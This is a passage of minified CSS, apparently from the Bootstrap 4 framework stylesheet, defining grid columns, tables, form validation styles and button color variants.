41.666667%; } .offset-md-6 { margin-left: 50%; } .offset-md-7 { margin-left: 58.333333%; } .offset-md-8 { margin-left: 66.666667%; } .offset-md-9 { margin-left: 75%; } .offset-md-10 { margin-left: 83.333333%; } .offset-md-11 { margin-left: 91.666667%; } } @media (min-width: 992px) { .col-lg { -ms-flex-preferred-size: 0; flex-basis: 0; -ms-flex-positive: 1; flex-grow: 1; max-width: 100%; } .row-cols-lg-1 > * { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .row-cols-lg-2 > * { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .row-cols-lg-3 > * { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .row-cols-lg-4 > * { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .row-cols-lg-5 > * { -ms-flex: 0 0 20%; flex: 0 0 20%; max-width: 20%; } .row-cols-lg-6 > * { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-lg-auto { -ms-flex: 0 0 auto; flex: 0 0 auto; width: auto; max-width: 100%; } .col-lg-1 { -ms-flex: 0 0 8.333333%; flex: 0 0 8.333333%; max-width: 8.333333%; } .col-lg-2 { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-lg-3 { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .col-lg-4 { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .col-lg-5 { -ms-flex: 0 0 41.666667%; flex: 0 0 41.666667%; max-width: 41.666667%; } .col-lg-6 { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .col-lg-7 { -ms-flex: 0 0 58.333333%; flex: 0 0 58.333333%; max-width: 58.333333%; } .col-lg-8 { -ms-flex: 0 0 66.666667%; flex: 0 0 66.666667%; max-width: 66.666667%; } .col-lg-9 { -ms-flex: 0 0 75%; flex: 0 0 75%; max-width: 75%; } .col-lg-10 { -ms-flex: 0 0 83.333333%; flex: 0 0 83.333333%; max-width: 83.333333%; } .col-lg-11 { -ms-flex: 0 0 91.666667%; flex: 0 0 91.666667%; max-width: 91.666667%; } .col-lg-12 { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .order-lg-first { -ms-flex-order: -1; order: -1; } .order-lg-last { -ms-flex-order: 13; order: 13; } .order-lg-0 { -ms-flex-order: 0; order: 0; } .order-lg-1 { -ms-flex-order: 1; order: 1; } .order-lg-2 { -ms-flex-order: 2; order: 2; } .order-lg-3 { -ms-flex-order: 3; order: 3; } .order-lg-4 { -ms-flex-order: 4; order: 4; } .order-lg-5 { -ms-flex-order: 5; order: 5; } .order-lg-6 { -ms-flex-order: 6; order: 6; } .order-lg-7 { -ms-flex-order: 7; order: 7; } .order-lg-8 { -ms-flex-order: 8; order: 8; } .order-lg-9 { -ms-flex-order: 9; order: 9; } .order-lg-10 { -ms-flex-order: 10; order: 10; } .order-lg-11 { -ms-flex-order: 11; order: 11; } .order-lg-12 { -ms-flex-order: 12; order: 12; } .offset-lg-0 { margin-left: 0; } .offset-lg-1 { margin-left: 8.333333%; } .offset-lg-2 { margin-left: 16.666667%; } .offset-lg-3 { margin-left: 25%; } .offset-lg-4 { margin-left: 33.333333%; } .offset-lg-5 { margin-left: 41.666667%; } .offset-lg-6 { margin-left: 50%; } .offset-lg-7 { margin-left: 58.333333%; } .offset-lg-8 { margin-left: 66.666667%; } .offset-lg-9 { margin-left: 75%; } .offset-lg-10 { margin-left: 83.333333%; } .offset-lg-11 { margin-left: 91.666667%; } } @media (min-width: 1200px) { .col-xl { -ms-flex-preferred-size: 0; flex-basis: 0; -ms-flex-positive: 1; flex-grow: 1; max-width: 100%; } .row-cols-xl-1 > * { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .row-cols-xl-2 > * { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .row-cols-xl-3 > * { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .row-cols-xl-4 > * { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .row-cols-xl-5 > * { -ms-flex: 0 0 20%; flex: 0 0 20%; max-width: 20%; } .row-cols-xl-6 > * { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-xl-auto { -ms-flex: 0 0 auto; flex: 0 0 auto; width: auto; max-width: 100%; } .col-xl-1 { -ms-flex: 0 0 8.333333%; flex: 0 0 8.333333%; max-width: 8.333333%; } .col-xl-2 { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-xl-3 { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .col-xl-4 { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .col-xl-5 { -ms-flex: 0 0 41.666667%; flex: 0 0 41.666667%; max-width: 41.666667%; } .col-xl-6 { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .col-xl-7 { -ms-flex: 0 0 58.333333%; flex: 0 0 58.333333%; max-width: 58.333333%; } .col-xl-8 { -ms-flex: 0 0 66.666667%; flex: 0 0 66.666667%; max-width: 66.666667%; } .col-xl-9 { -ms-flex: 0 0 75%; flex: 0 0 75%; max-width: 75%; } .col-xl-10 { -ms-flex: 0 0 83.333333%; flex: 0 0 83.333333%; max-width: 83.333333%; } .col-xl-11 { -ms-flex: 0 0 91.666667%; flex: 0 0 91.666667%; max-width: 91.666667%; } .col-xl-12 { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .order-xl-first { -ms-flex-order: -1; order: -1; } .order-xl-last { -ms-flex-order: 13; order: 13; } .order-xl-0 { -ms-flex-order: 0; order: 0; } .order-xl-1 { -ms-flex-order: 1; order: 1; } .order-xl-2 { -ms-flex-order: 2; order: 2; } .order-xl-3 { -ms-flex-order: 3; order: 3; } .order-xl-4 { -ms-flex-order: 4; order: 4; } .order-xl-5 { -ms-flex-order: 5; order: 5; } .order-xl-6 { -ms-flex-order: 6; order: 6; } .order-xl-7 { -ms-flex-order: 7; order: 7; } .order-xl-8 { -ms-flex-order: 8; order: 8; } .order-xl-9 { -ms-flex-order: 9; order: 9; } .order-xl-10 { -ms-flex-order: 10; order: 10; } .order-xl-11 { -ms-flex-order: 11; order: 11; } .order-xl-12 { -ms-flex-order: 12; order: 12; } .offset-xl-0 { margin-left: 0; } .offset-xl-1 { margin-left: 8.333333%; } .offset-xl-2 { margin-left: 16.666667%; } .offset-xl-3 { margin-left: 25%; } .offset-xl-4 { margin-left: 33.333333%; } .offset-xl-5 { margin-left: 41.666667%; } .offset-xl-6 { margin-left: 50%; } .offset-xl-7 { margin-left: 58.333333%; } .offset-xl-8 { margin-left: 66.666667%; } .offset-xl-9 { margin-left: 75%; } .offset-xl-10 { margin-left: 83.333333%; } .offset-xl-11 { margin-left: 91.666667%; } } .table { width: 100%; margin-bottom: 1rem; color: #212529; } .table th, .table td { padding: 0.75rem; vertical-align: top; border-top: 1px solid #dee2e6; } .table thead th { vertical-align: bottom; border-bottom: 2px solid #dee2e6; } .table tbody + tbody { border-top: 2px solid #dee2e6; } .table-sm th, .table-sm td { padding: 0.3rem; } .table-bordered { border: 1px solid #dee2e6; } .table-bordered th, .table-bordered td { border: 1px solid #dee2e6; } .table-bordered thead th, .table-bordered thead td { border-bottom-width: 2px; } .table-borderless th, .table-borderless td, .table-borderless thead th, .table-borderless tbody + tbody { border: 0; } .table-striped tbody tr:nth-of-type(odd) { background-color: rgba(0, 0, 0, 0.05); } .table-hover tbody tr:hover { color: #212529; background-color: rgba(0, 0, 0, 0.075); } .table-primary, .table-primary > th, .table-primary > td { background-color: #b8daff; } .table-primary th, .table-primary td, .table-primary thead th, .table-primary tbody + tbody { border-color: #7abaff; } .table-hover .table-primary:hover { background-color: #9fcdff; } .table-hover .table-primary:hover > td, .table-hover .table-primary:hover > th { background-color: #9fcdff; } .table-secondary, .table-secondary > th, .table-secondary > td { background-color: #d6d8db; } .table-secondary th, .table-secondary td, .table-secondary thead th, .table-secondary tbody + tbody { border-color: #b3b7bb; } .table-hover .table-secondary:hover { background-color: #c8cbcf; } .table-hover .table-secondary:hover > td, .table-hover .table-secondary:hover > th { background-color: #c8cbcf; } .table-success, .table-success > th, .table-success > td { background-color: #c3e6cb; } .table-success th, .table-success td, .table-success thead th, .table-success tbody + tbody { border-color: #8fd19e; } .table-hover .table-success:hover { background-color: #b1dfbb; } .table-hover .table-success:hover > td, .table-hover .table-success:hover > th { background-color: #b1dfbb; } .table-info, .table-info > th, .table-info > td { background-color: #bee5eb; } .table-info th, .table-info td, .table-info thead th, .table-info tbody + tbody { border-color: #86cfda; } .table-hover .table-info:hover { background-color: #abdde5; } .table-hover .table-info:hover > td, .table-hover .table-info:hover > th { background-color: #abdde5; } .table-warning, .table-warning > th, .table-warning > td { background-color: #ffeeba; } .table-warning th, .table-warning td, .table-warning thead th, .table-warning tbody + tbody { border-color: #ffdf7e; } .table-hover .table-warning:hover { background-color: #ffe8a1; } .table-hover .table-warning:hover > td, .table-hover .table-warning:hover > th { background-color: #ffe8a1; } .table-danger, .table-danger > th, .table-danger > td { background-color: #f5c6cb; } .table-danger th, .table-danger td, .table-danger thead th, .table-danger tbody + tbody { border-color: #ed969e; } .table-hover .table-danger:hover { background-color: #f1b0b7; } .table-hover .table-danger:hover > td, .table-hover .table-danger:hover > th { background-color: #f1b0b7; } .table-light, .table-light > th, .table-light > td { background-color: #fdfdfe; } .table-light th, .table-light td, .table-light thead th, .table-light tbody + tbody { border-color: #fbfcfc; } .table-hover .table-light:hover { background-color: #ececf6; } .table-hover .table-light:hover > td, .table-hover .table-light:hover > th { background-color: #ececf6; } .table-dark, .table-dark > th, .table-dark > td { background-color: #c6c8ca; } .table-dark th, .table-dark td, .table-dark thead th, .table-dark tbody + tbody { border-color: #95999c; } .table-hover .table-dark:hover { background-color: #b9bbbe; } .table-hover .table-dark:hover > td, .table-hover .table-dark:hover > th { background-color: #b9bbbe; } .table-active, .table-active > th, .table-active > td { background-color: rgba(0, 0, 0, 0.075); } .table-hover .table-active:hover { background-color: rgba(0, 0, 0, 0.075); } .table-hover .table-active:hover > td, .table-hover .table-active:hover > th { background-color: rgba(0, 0, 0, 0.075); } .table .thead-dark th { color: #fff; background-color: #343a40; border-color: #454d55; } .table .thead-light th { color: #495057; background-color: #e9ecef; border-color: #dee2e6; } .table-dark { color: #fff; background-color: #343a40; } .table-dark th, .table-dark td, .table-dark thead th { border-color: #454d55; } .table-dark.table-bordered { border: 0; } .table-dark.table-striped tbody tr:nth-of-type(odd) { background-color: rgba(255, 255, 255, 0.05); } .table-dark.table-hover tbody tr:hover { color: #fff; background-color: rgba(255, 255, 255, 0.075); } @media (max-width: 575.98px) { .table-responsive-sm { display: block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch; } .table-responsive-sm > .table-bordered { border: 0; } } @media (max-width: 767.98px) { .table-responsive-md { display: block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch; } .table-responsive-md > .table-bordered { border: 0; } } @media (max-width: 991.98px) { .table-responsive-lg { display: block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch; } .table-responsive-lg > .table-bordered { border: 0; } } @media (max-width: 1199.98px) { .table-responsive-xl { display: block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch; } .table-responsive-xl > .table-bordered { border: 0; } } .table-responsive { display: block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch; } .table-responsive > .table-bordered { border: 0; } .form-control { display: block; width: 100%; height: calc(1.5em + 0.75rem + 2px); padding: 0.375rem 0.75rem; font-size: 1rem; font-weight: 400; line-height: 1.5; color: #495057; background-color: #fff; background-clip: padding-box; border: 1px solid #ced4da; border-radius: 0.25rem; transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out; } @media (prefers-reduced-motion: reduce) { .form-control { transition: none; } } .form-control::-ms-expand { background-color: transparent; border: 0; } .form-control:-moz-focusring { color: transparent; text-shadow: 0 0 0 #495057; } .form-control:focus { color: #495057; background-color: #fff; border-color: #80bdff; outline: 0; box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.25); } .form-control::-webkit-input-placeholder { color: #6c757d; opacity: 1; } .form-control::-moz-placeholder { color: #6c757d; opacity: 1; } .form-control:-ms-input-placeholder { color: #6c757d; opacity: 1; } .form-control::-ms-input-placeholder { color: #6c757d; opacity: 1; } .form-control::placeholder { color: #6c757d; opacity: 1; } .form-control:disabled, .form-control[readonly] { background-color: #e9ecef; opacity: 1; } select.form-control:focus::-ms-value { color: #495057; background-color: #fff; } .form-control-file, .form-control-range { display: block; width: 100%; } .col-form-label { padding-top: calc(0.375rem + 1px); padding-bottom: calc(0.375rem + 1px); margin-bottom: 0; font-size: inherit; line-height: 1.5; } .col-form-label-lg { padding-top: calc(0.5rem + 1px); padding-bottom: calc(0.5rem + 1px); font-size: 1.25rem; line-height: 1.5; } .col-form-label-sm { padding-top: calc(0.25rem + 1px); padding-bottom: calc(0.25rem + 1px); font-size: 0.875rem; line-height: 1.5; } .form-control-plaintext { display: block; width: 100%; padding: 0.375rem 0; margin-bottom: 0; font-size: 1rem; line-height: 1.5; color: #212529; background-color: transparent; border: solid transparent; border-width: 1px 0; } .form-control-plaintext.form-control-sm, .form-control-plaintext.form-control-lg { padding-right: 0; padding-left: 0; } .form-control-sm { height: calc(1.5em + 0.5rem + 2px); padding: 0.25rem 0.5rem; font-size: 0.875rem; line-height: 1.5; border-radius: 0.2rem; } .form-control-lg { height: calc(1.5em + 1rem + 2px); padding: 0.5rem 1rem; font-size: 1.25rem; line-height: 1.5; border-radius: 0.3rem; } select.form-control[size], select.form-control[multiple] { height: auto; } textarea.form-control { height: auto; } .form-group { margin-bottom: 1rem; } .form-text { display: block; margin-top: 0.25rem; } .form-row { display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; margin-right: -5px; margin-left: -5px; } .form-row > .col, .form-row > [class*="col-"] { padding-right: 5px; padding-left: 5px; } .form-check { position: relative; display: block; padding-left: 1.25rem; } .form-check-input { position: absolute; margin-top: 0.3rem; margin-left: -1.25rem; } .form-check-input[disabled] ~ .form-check-label, .form-check-input:disabled ~ .form-check-label { color: #6c757d; } .form-check-label { margin-bottom: 0; } .form-check-inline { display: -ms-inline-flexbox; display: inline-flex; -ms-flex-align: center; align-items: center; padding-left: 0; margin-right: 0.75rem; } .form-check-inline .form-check-input { position: static; margin-top: 0; margin-right: 0.3125rem; margin-left: 0; } .valid-feedback { display: none; width: 100%; margin-top: 0.25rem; font-size: 80%; color: #28a745; } .valid-tooltip { position: absolute; top: 100%; z-index: 5; display: none; max-width: 100%; padding: 0.25rem 0.5rem; margin-top: .1rem; font-size: 0.875rem; line-height: 1.5; color: #fff; background-color: rgba(40, 167, 69, 0.9); border-radius: 0.25rem; } .was-validated :valid ~ .valid-feedback, .was-validated :valid ~ .valid-tooltip, .is-valid ~ .valid-feedback, .is-valid ~ .valid-tooltip { display: block; } .was-validated .form-control:valid, .form-control.is-valid { border-color: #28a745; padding-right: calc(1.5em + 0.75rem); background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='8' height='8' viewBox='0 0 8 8'%3e%3cpath fill='%2328a745' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e"); background-repeat: no-repeat; background-position: right calc(0.375em + 0.1875rem) center; background-size: calc(0.75em + 0.375rem) calc(0.75em + 0.375rem); } .was-validated .form-control:valid:focus, .form-control.is-valid:focus { border-color: #28a745; box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25); } .was-validated textarea.form-control:valid, textarea.form-control.is-valid { padding-right: calc(1.5em + 0.75rem); background-position: top calc(0.375em + 0.1875rem) right calc(0.375em + 0.1875rem); } .was-validated .custom-select:valid, .custom-select.is-valid { border-color: #28a745; padding-right: calc(0.75em + 2.3125rem); background: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='5' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e") no-repeat right 0.75rem center/8px 10px, url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='8' height='8' viewBox='0 0 8 8'%3e%3cpath fill='%2328a745' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e") #fff no-repeat center right 1.75rem/calc(0.75em + 0.375rem) calc(0.75em + 0.375rem); } .was-validated .custom-select:valid:focus, .custom-select.is-valid:focus { border-color: #28a745; box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25); } .was-validated .form-check-input:valid ~ .form-check-label, .form-check-input.is-valid ~ .form-check-label { color: #28a745; } .was-validated .form-check-input:valid ~ .valid-feedback, .was-validated .form-check-input:valid ~ .valid-tooltip, .form-check-input.is-valid ~ .valid-feedback, .form-check-input.is-valid ~ .valid-tooltip { display: block; } .was-validated .custom-control-input:valid ~ .custom-control-label, .custom-control-input.is-valid ~ .custom-control-label { color: #28a745; } .was-validated .custom-control-input:valid ~ .custom-control-label::before, .custom-control-input.is-valid ~ .custom-control-label::before { border-color: #28a745; } .was-validated .custom-control-input:valid:checked ~ .custom-control-label::before, .custom-control-input.is-valid:checked ~ .custom-control-label::before { border-color: #34ce57; background-color: #34ce57; } .was-validated .custom-control-input:valid:focus ~ .custom-control-label::before, .custom-control-input.is-valid:focus ~ .custom-control-label::before { box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25); } .was-validated .custom-control-input:valid:focus:not(:checked) ~ .custom-control-label::before, .custom-control-input.is-valid:focus:not(:checked) ~ .custom-control-label::before { border-color: #28a745; } .was-validated .custom-file-input:valid ~ .custom-file-label, .custom-file-input.is-valid ~ .custom-file-label { border-color: #28a745; } .was-validated .custom-file-input:valid:focus ~ .custom-file-label, .custom-file-input.is-valid:focus ~ .custom-file-label { border-color: #28a745; box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25); } .invalid-feedback { display: none; width: 100%; margin-top: 0.25rem; font-size: 80%; color: #dc3545; } .invalid-tooltip { position: absolute; top: 100%; z-index: 5; display: none; max-width: 100%; padding: 0.25rem 0.5rem; margin-top: .1rem; font-size: 0.875rem; line-height: 1.5; color: #fff; background-color: rgba(220, 53, 69, 0.9); border-radius: 0.25rem; } .was-validated :invalid ~ .invalid-feedback, .was-validated :invalid ~ .invalid-tooltip, .is-invalid ~ .invalid-feedback, .is-invalid ~ .invalid-tooltip { display: block; } .was-validated .form-control:invalid, .form-control.is-invalid { border-color: #dc3545; padding-right: calc(1.5em + 0.75rem); background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' fill='none' stroke='%23dc3545' viewBox='0 0 12 12'%3e%3ccircle cx='6' cy='6' r='4.5'/%3e%3cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3e%3ccircle cx='6' cy='8.2' r='.6' fill='%23dc3545' stroke='none'/%3e%3c/svg%3e"); background-repeat: no-repeat; background-position: right calc(0.375em + 0.1875rem) center; background-size: calc(0.75em + 0.375rem) calc(0.75em + 0.375rem); } .was-validated .form-control:invalid:focus, .form-control.is-invalid:focus { border-color: #dc3545; box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25); } .was-validated textarea.form-control:invalid, textarea.form-control.is-invalid { padding-right: calc(1.5em + 0.75rem); background-position: top calc(0.375em + 0.1875rem) right calc(0.375em + 0.1875rem); } .was-validated .custom-select:invalid, .custom-select.is-invalid { border-color: #dc3545; padding-right: calc(0.75em + 2.3125rem); background: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='5' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e") no-repeat right 0.75rem center/8px 10px, url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' fill='none' stroke='%23dc3545' viewBox='0 0 12 12'%3e%3ccircle cx='6' cy='6' r='4.5'/%3e%3cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3e%3ccircle cx='6' cy='8.2' r='.6' fill='%23dc3545' stroke='none'/%3e%3c/svg%3e") #fff no-repeat center right 1.75rem/calc(0.75em + 0.375rem) calc(0.75em + 0.375rem); } .was-validated .custom-select:invalid:focus, .custom-select.is-invalid:focus { border-color: #dc3545; box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25); } .was-validated .form-check-input:invalid ~ .form-check-label, .form-check-input.is-invalid ~ .form-check-label { color: #dc3545; } .was-validated .form-check-input:invalid ~ .invalid-feedback, .was-validated .form-check-input:invalid ~ .invalid-tooltip, .form-check-input.is-invalid ~ .invalid-feedback, .form-check-input.is-invalid ~ .invalid-tooltip { display: block; } .was-validated .custom-control-input:invalid ~ .custom-control-label, .custom-control-input.is-invalid ~ .custom-control-label { color: #dc3545; } .was-validated .custom-control-input:invalid ~ .custom-control-label::before, .custom-control-input.is-invalid ~ .custom-control-label::before { border-color: #dc3545; } .was-validated .custom-control-input:invalid:checked ~ .custom-control-label::before, .custom-control-input.is-invalid:checked ~ .custom-control-label::before { border-color: #e4606d; background-color: #e4606d; } .was-validated .custom-control-input:invalid:focus ~ .custom-control-label::before, .custom-control-input.is-invalid:focus ~ .custom-control-label::before { box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25); } .was-validated .custom-control-input:invalid:focus:not(:checked) ~ .custom-control-label::before, .custom-control-input.is-invalid:focus:not(:checked) ~ .custom-control-label::before { border-color: #dc3545; } .was-validated .custom-file-input:invalid ~ .custom-file-label, .custom-file-input.is-invalid ~ .custom-file-label { border-color: #dc3545; } .was-validated .custom-file-input:invalid:focus ~ .custom-file-label, .custom-file-input.is-invalid:focus ~ .custom-file-label { border-color: #dc3545; box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25); } .form-inline { display: -ms-flexbox; display: flex; -ms-flex-flow: row wrap; flex-flow: row wrap; -ms-flex-align: center; align-items: center; } .form-inline .form-check { width: 100%; } @media (min-width: 576px) { .form-inline label { display: -ms-flexbox; display: flex; -ms-flex-align: center; align-items: center; -ms-flex-pack: center; justify-content: center; margin-bottom: 0; } .form-inline .form-group { display: -ms-flexbox; display: flex; -ms-flex: 0 0 auto; flex: 0 0 auto; -ms-flex-flow: row wrap; flex-flow: row wrap; -ms-flex-align: center; align-items: center; margin-bottom: 0; } .form-inline .form-control { display: inline-block; width: auto; vertical-align: middle; } .form-inline .form-control-plaintext { display: inline-block; } .form-inline .input-group, .form-inline .custom-select { width: auto; } .form-inline .form-check { display: -ms-flexbox; display: flex; -ms-flex-align: center; align-items: center; -ms-flex-pack: center; justify-content: center; width: auto; padding-left: 0; } .form-inline .form-check-input { position: relative; -ms-flex-negative: 0; flex-shrink: 0; margin-top: 0; margin-right: 0.25rem; margin-left: 0; } .form-inline .custom-control { -ms-flex-align: center; align-items: center; -ms-flex-pack: center; justify-content: center; } .form-inline .custom-control-label { margin-bottom: 0; } } .btn { display: inline-block; font-weight: 400; color: #212529; text-align: center; vertical-align: middle; cursor: pointer; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; background-color: transparent; border: 1px solid transparent; padding: 0.375rem 0.75rem; font-size: 1rem; line-height: 1.5; border-radius: 0.25rem; transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out; } @media (prefers-reduced-motion: reduce) { .btn { transition: none; } } .btn:hover { color: #212529; text-decoration: none; } .btn:focus, .btn.focus { outline: 0; box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.25); } .btn.disabled, .btn:disabled { opacity: 0.65; } a.btn.disabled, fieldset:disabled a.btn { pointer-events: none; } .btn-primary { color: #fff; background-color: #007bff; border-color: #007bff; } .btn-primary:hover { color: #fff; background-color: #0069d9; border-color: #0062cc; } .btn-primary:focus, .btn-primary.focus { color: #fff; background-color: #0069d9; border-color: #0062cc; box-shadow: 0 0 0 0.2rem rgba(38, 143, 255, 0.5); } .btn-primary.disabled, .btn-primary:disabled { color: #fff; background-color: #007bff; border-color: #007bff; } .btn-primary:not(:disabled):not(.disabled):active, .btn-primary:not(:disabled):not(.disabled).active, .show > .btn-primary.dropdown-toggle { color: #fff; background-color: #0062cc; border-color: #005cbf; } .btn-primary:not(:disabled):not(.disabled):active:focus, .btn-primary:not(:disabled):not(.disabled).active:focus, .show > .btn-primary.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(38, 143, 255, 0.5); } .btn-secondary { color: #fff; background-color: #6c757d; border-color: #6c757d; } .btn-secondary:hover { color: #fff; background-color: #5a6268; border-color: #545b62; } .btn-secondary:focus, .btn-secondary.focus { color: #fff; background-color: #5a6268; border-color: #545b62; box-shadow: 0 0 0 0.2rem rgba(130, 138, 145, 0.5); } .btn-secondary.disabled, .btn-secondary:disabled { color: #fff; background-color: #6c757d; border-color: #6c757d; } .btn-secondary:not(:disabled):not(.disabled):active, .btn-secondary:not(:disabled):not(.disabled).active, .show > .btn-secondary.dropdown-toggle { color: #fff; background-color: #545b62; border-color: #4e555b; } .btn-secondary:not(:disabled):not(.disabled):active:focus, .btn-secondary:not(:disabled):not(.disabled).active:focus, .show > .btn-secondary.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(130, 138, 145, 0.5); } .btn-success { color: #fff; background-color: #28a745; border-color: #28a745; } .btn-success:hover { color: #fff; background-color: #218838; border-color: #1e7e34; } .btn-success:focus, .btn-success.focus { color: #fff; background-color: #218838; border-color: #1e7e34; box-shadow: 0 0 0 0.2rem rgba(72, 180, 97, 0.5); } .btn-success.disabled, .btn-success:disabled { color: #fff; background-color: #28a745; border-color: #28a745; } .btn-success:not(:disabled):not(.disabled):active, .btn-success:not(:disabled):not(.disabled).active, .show > .btn-success.dropdown-toggle { color: #fff; background-color: #1e7e34; border-color: #1c7430; } .btn-success:not(:disabled):not(.disabled):active:focus, .btn-success:not(:disabled):not(.disabled).active:focus, .show > .btn-success.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(72, 180, 97, 0.5); } .btn-info { color: #fff; background-color: #17a2b8; border-color: #17a2b8; } .btn-info:hover { color: #fff; background-color: #138496; border-color: #117a8b; } .btn-info:focus, .btn-info.focus { color: #fff; background-color: #138496; border-color: #117a8b; box-shadow: 0 0 0 0.2rem rgba(58, 176, 195, 0.5); } .btn-info.disabled, .btn-info:disabled { color: #fff; background-color: #17a2b8; border-color: #17a2b8; } .btn-info:not(:disabled):not(.disabled):active, .btn-info:not(:disabled):not(.disabled).active, .show > .btn-info.dropdown-toggle { color: #fff; background-color: #117a8b; border-color: #10707f; } .btn-info:not(:disabled):not(.disabled):active:focus, .btn-info:not(:disabled):not(.disabled).active:focus, .show > .btn-info.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(58, 176, 195, 0.5); } .btn-warning { color: #212529; background-color: #ffc107; border-color: #ffc107; } .btn-warning:hover { color: #212529; background-color: #e0a800; border-color: #d39e00; } .btn-warning:focus, .btn-warning.focus { color: #212529; background-color: #e0a800; border-color: #d39e00; box-shadow: 0 0 0 0.2rem rgba(222, 170, 12, 0.5); } .btn-warning.disabled, .btn-warning:disabled { color: #212529; background-color: #ffc107; border-color: #ffc107; } .btn-warning:not(:disabled):not(.disabled):active, .btn-warning:not(:disabled):not(.disabled).active, .show > .btn-warning.dropdown-toggle { color: #212529; background-color: #d39e00; border-color: #c69500; } .btn-warning:not(:disabled):not(.disabled):active:focus, .btn-warning:not(:disabled):not(.disabled).active:focus, .show > .btn-warning.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(222, 170, 12, 0.5); } .btn-danger { color: #fff; background-color: #dc3545; border-color: #dc3545; } .btn-danger:hover { color: #fff; background-color: #c82333; border-color: #bd2130; } .btn-danger:focus, .btn-danger.focus { color: #fff; background-color: #c82333; border-color: #bd2130; box-shadow: 0 0 0 0.2rem rgba(225, 83, 97, 0.5); } .btn-danger.disabled, .btn-danger:disabled { color: #fff; background-color: #dc3545; border-color: #dc3545; } .btn-danger:not(:disabled):not(.disabled):active, .btn-danger:not(:disabled):not(.disabled).active, .show > .btn-danger.dropdown-toggle { color: #fff; background-color: #bd2130; border-color: #b21f2d; } .btn-danger:not(:disabled):not(.disabled):active:focus, .btn-danger:not(:disabled):not(.disabled).active:focus, .show > .btn-danger.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(225, 83, 97, 0.5); } .btn-light { color: #212529; background-color: #f8f9fa; border-color: #f8f9fa; } .btn-light:hover { color: #212529; background-color: #e2e6ea; border-color: #dae0e5; } .btn-light:focus, .btn-light.focus { color: #212529; background-color: #e2e6ea; border-color: #dae0e5; box-shadow: 0 0 0 0.2rem rgba(216, 217, 219, 0.5); } .btn-light.disabled, .btn-light:disabled { color: #212529; background-color: #f8f9fa; border-color: #f8f9fa; } .btn-light:not(:disabled):not(.disabled):active, .btn-light:not(:disabled):not(.disabled).active, .show > .btn-light.dropdown-toggle { color: #212529; background-color: #dae0e5; border-color: #d3d9df; } .btn-light:not(:disabled):not(.disabled):active:focus, 